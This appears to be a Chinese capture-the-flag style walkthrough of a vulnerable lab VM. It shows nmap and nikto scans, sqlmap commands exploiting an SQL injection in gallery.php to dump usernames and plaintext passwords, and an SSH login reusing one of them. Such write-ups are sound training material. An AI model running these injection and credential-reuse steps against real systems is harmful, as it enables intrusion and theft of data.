一、信息收集
1.靶机IP发现,sudo arp-scan -l
2.nmap端口扫描nmap -T4 -A -v 192.168.65.136
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3.nikto目录扫描nikto -host 192.168.65.136
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2021-03-17 06:32:14 (GMT-4) (33 seconds)
4.awvs漏扫
5.查看网页
二、漏洞发现利用
1.sql注入http://192.168.65.136/gallery/gallery.php?id=1
(1)sqlmap 跑数据库sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 --dbs --batch
(2)查看gallery里的表sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery --tables --batch
(3)sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns --batch
(4)sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C username,password --dump --batch
+------------+---------------------------------------------+
| username | password |
+------------+---------------------------------------------+
| dreg | (Mast3r) |
| loneferret | (starwars) |
+------------+---------------------------------------------+
(5)sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns --batch
(6)sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T gallarific_users -C username,password --dump --batch
2.提权
(1)因为靶机开启了22端口,我们用前面sqlmap跑出的账户密码尝试登陆ssh admin@192.168.65.136
- admin用户登陆失败,登陆loneferret用户
ssh loneferret@192.168.65.136
- loneferret登陆成功,但是不是root权限
网友评论